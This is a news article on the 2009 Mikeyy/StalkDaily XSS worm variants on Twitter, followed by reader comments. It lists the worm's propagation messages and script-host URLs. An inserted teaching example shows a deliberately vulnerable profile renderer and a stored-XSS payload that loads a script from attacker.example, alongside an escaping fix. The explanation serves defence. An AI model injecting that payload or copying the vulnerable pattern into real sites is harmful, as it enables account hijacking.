Twitter hit by multiple variants of XSS worm

Summary: During the weekend and early Monday, at least four separate variants of the original StalkDaily.com XSS worm hit the popular micro-blogging site Twitter. By exploiting cross site scripting flaws at the site, the worm automatically hijacked accounts and advertised the author's web site by posting tweets on behalf of the account holders.

The worm's 17-year-old author, Mikey Mooney, claimed responsibility for it (a photo of him and a podcast interview are available), citing boredom and insisting that the most recent variant, launched on Monday, was meant to prove that Twitter had not fixed the cross site scripting flaw it claimed to have taken care of earlier that day.

Let's analyze all of Mikey's campaigns.

With the proof of concept code for both worms now publicly available, and with NoScript creator Giorgio Maone's logical conclusion that Twitter may in fact not have fixed the XSS flaw, since the second variant, launched by a third party, was essentially an obfuscated version of the first, Mikey's claims may well be true.

The original StalkDaily.com/Mikeyy XSS worm campaign automatically tweeted the following messages:

"Dude, www.StalkDaily.com is awesome. What's the fuss?" "Join www.StalkDaily.com everyone!" "Woooo, www.StalkDaily.com :)" "Virus!? What? www.StalkDaily.com is legit!" "Wow...www.StalkDaily.com" "@twitter www.StalkDaily.com"

Mikey's first release would then attempt to steal cookies and continue spreading by loading the following URLs, which he has since removed: mikeyylolz.uuuq .com/x.js and mikeyylolz.uuuq .com/x.php.

The second Mikeyy XSS worm, launched on Sunday, is a bit more interesting, as it appears to be a copycat worm that spread using the following messages:

"Wow...Mikeyy." "Man, Twitter can't fix shit. Mikeyy owns. :)" "Dude! Mikeyy! Seriously? Haha. ;)" "Dude, Mikeyy is the shit! :)" "damn mikeyy. haha." "Twitter should really fix this..." "Mikeyy I am done..." "Mikeyy is done.." "Twitter please fix this, regards Mikeyy"

The second variant, together with a modified version of it, would then attempt to propagate further by directing the affected users' browsers to the following URLs: content.ireel .com/jsxss.js; content.ireel .com/xssjs.js; omghax.uuuq .com/x.php; omghax.uuuq .com/woo.php; bambamyo.110mb .com/wompwomp.js. What we also have here is an indication of a compromise at iReel.com, since the script was being served from its content host.

The most recent variant of the worm was launched yesterday and apparently relied on an input validation flaw that Mikeyy claims is a second, separate vulnerability he exploited at Twitter.

The campaign was using the following messages to propagate:

"Twitter, freaking fix this already. >:[ - Mikeyy" "Twitter, your community is going to be mad at you... - Mikeyy" "This worm is getting out of hand Twitter. - Mikeyy" "RT!! 4th gen #Mikeyy worm on the loose! Click here to protect yourself: http://tinyurl.com/cojc6s" "This is all Twitters fault! Don't blame Mikeyy!!" "ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT: http://bit.ly/4ywBID" "How TO remove new Mikeyy worm! RT!! http://bit.ly/yCL1s"

Once deobfuscated, the scripts point to twitter .com/reberbrerber and to stalkdaily .com/ajax.js. Interestingly, bit.ly's public stats let us gauge the click-through rate of the latest campaign: 20,140 clicks so far for the first URL (9,268 from the U.S., followed by 3,039 from the U.K.), and 8,961 clicks for the second (4,095 from the U.S., followed by 1,452 from the U.K.).

With or without malicious intent to spread malware, Mikey's persistent actions aimed at proving Twitter's inability to fix its cross site scripting flaws are illegal, and so is the potential compromise of iReel.com for hosting the JavaScript code. And whereas these campaigns did not introduce malware or try to monetize the traffic, for instance by installing scareware, different people have different motivations. So instead of waiting for hardcore cybercriminals to take advantage of such flaws, Twitter should really start treating (trivial) cross site scripting flaws more proactively.
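The flaw class behind all four variants is stored XSS: a profile field is written once by the attacker and then rendered, unescaped, into the page of every visitor, whose browser then loads the worm script (the x.js of the first release) and repeats the injection in the visitor's own profile. The following is an added example, not code from the article, from Twitter, or from the worm itself: a minimal profile renderer with the vulnerable concatenation beside the output-encoded version. The field name, the payload and the attacker host (attacker.example) are constructed for illustration and are not the worm's actual injection string.

```javascript
// Added example: stored-XSS pattern behind a profile worm, and the fix.
// Names, payload and host below are assumptions made up for the demo.

// Encode the characters that can break out of an HTML text or attribute
// context. Used on every untrusted value placed in the page.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// VULNERABLE: user-controlled profile data concatenated straight into markup.
// Every visitor who views this profile executes whatever the field contains;
// a script that posts tweets and writes itself into the viewer's profile is
// a self-propagating worm of the kind described above.
function renderProfileUnsafe(profile) {
  return '<div class="profile">' +
    '<a href="' + profile.url + '">' + profile.name + '</a>' +
    '</div>';
}

// HARDENED: the URL is validated as absolute http(s) (so javascript: links
// are rejected rather than merely escaped) and everything is HTML-encoded
// for the context it lands in.
function safeHref(url) {
  try {
    const parsed = new URL(String(url));
    if (parsed.protocol === "http:" || parsed.protocol === "https:") {
      return escapeHtml(parsed.href);
    }
  } catch (e) {
    // not an absolute URL at all; fall through to the inert default
  }
  return "#";
}

function renderProfileSafe(profile) {
  return '<div class="profile">' +
    '<a href="' + safeHref(profile.url) + '">' + escapeHtml(profile.name) + '</a>' +
    '</div>';
}

// Constructed worm-style payload (hypothetical): closes the href attribute,
// injects a remote script, and reopens an anchor so the markup still parses.
const WORM_PAYLOAD =
  '"><script src="http://attacker.example/x.js"></script><a href="';

const victimProfile = { name: "alice", url: WORM_PAYLOAD };

// Crude check used only by this demo: did a script tag reach the output?
function containsScript(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", renderProfileUnsafe(victimProfile));
  console.log("safe:  ", renderProfileSafe(victimProfile));
}
```

Encoding on output is the fix the article is asking for; filtering tweets for known worm messages or URLs, as the bit.ly "removal" links in the fourth variant pretended to do, only chases the current payload.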

Topics: Security, Social Enterprise

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Talkback

15 comments
  • You're behind the times...

    This already hit the /. community two days ago, and most of the talk has been the usual "tar & feather" kind for the 17-year-old who created this particular worm. Especially given that at least one of these variants was completely egocentrically benign.

    Frankly, I think more of this sort of thing should be done -- ethically, mind you -- warning of the exploit rather than simply injecting it and letting havoc run loose. Particularly given that I've watched elsewhere when this has been done and the web designer completely ignores that they have a hole in their code.
    michael.baldelli1
  • Rewards for the guilty

    So Net News Daily publishes an interview with the worm creator, who wrote the damn thing to get attention. Then bloggers parrot the purp's name in blog posts. I'd say that's MISSION ACCOMPLISHED. Duh.

    There is a reason the NFL no longer allows TV networks to broadcast streakers running across the ball field.
    Telexer
  • RE: Twitter hit by multiple variants of XSS worm

    Let me get this straight, this idiot caused all this trouble because he was bored.

    Someone in law enforcement needs to show this idiot what a mess he has caused, then make him fix it and then apologise to all he infected with his idiotic stunt.

    All something like this does is scare the crap out of everyone else.

    It makes me so mad that idiots like this one think it's fun to cause so much havoc, and why? Because he was bored. "Give me a break."

    There needs to be a precedent set, and his ass should be thrown in gaol regardless of whether he is 17 or not.
    He knew what he was doing; now he should take responsibility for his actions.
    davidreddin
    • Community Service?

      A few weeks of sweeping the streets and picking up litter should relieve the boredom. The trouble with jail is that they are 'Universities of Crime', and jails don't need another 'Professor of Cyber-Crime!'
      Brother Martin de Porres
  • RE: Twitter hit by multiple variants of XSS worm

    Gaol, so classically spelled, is a hole in the ground. Perhaps remove the boredom by picking up trash until the economic damage has been repaid with 15% or so interest.
    "My screwing with u is actually my doing u a favour" is an ultimate punk pose,
    which perhaps he needs to lose, or else get punked out.
    gabrielbear
    • "Pooper-Scooper-Patrol"

      You took the words out of my mouth, I concur! How about clearing the streets of real shit? He might not like the media attention while he works, and it would send a message to other would-be 'fixers'.
      Brother Martin de Porres
  • Worms....

    Abandon the desktop because of worms! Jump into the wormy cloud....

    At least on the desktop I can control whether I am safe or not.
    JoeMama_z
  • RE: Twitter hit by multiple variants of XSS worm

    Jail time, lots and lots of boring, boring jail time.
    kzot
    • Jail time...

      Remember, this person who created this worm was very bored so putting him in a bored jail may not be the best thing.
      phatkat
  • RE: Twitter hit by multiple variants of XSS worm

    Betcha he gets bored in jail in ways he never thought of getting bored.
    inkwell
  • The world's....

    cyber-infrastructure will be collapsed by some 'bored' 17-year-old.

    I only wish it were a joke.
    fewiii
  • RE: Twitter hit by multiple variants of XSS worm

    If you hire and celebrate every criminal the net result will probably not be very positive over the long term. That's a fairly safe assumption. Instead of promoting in my opinion illegal/destructive behavior we should be focusing on those providing solutions, like www.justaskgemalto.com the digital security site.
    Steve KTG
  • Just one more reason NOT to use this dumb site. (nt)

    ...
    IT_Guy_z
  • RE: Twitter hit by multiple variants of XSS worm

    Oooooh let's all twitter about it!
    GPP
  • RE: Twitter hit by multiple variants of XSS worm

    Great!!! Thanks for sharing this information with us!
    birumut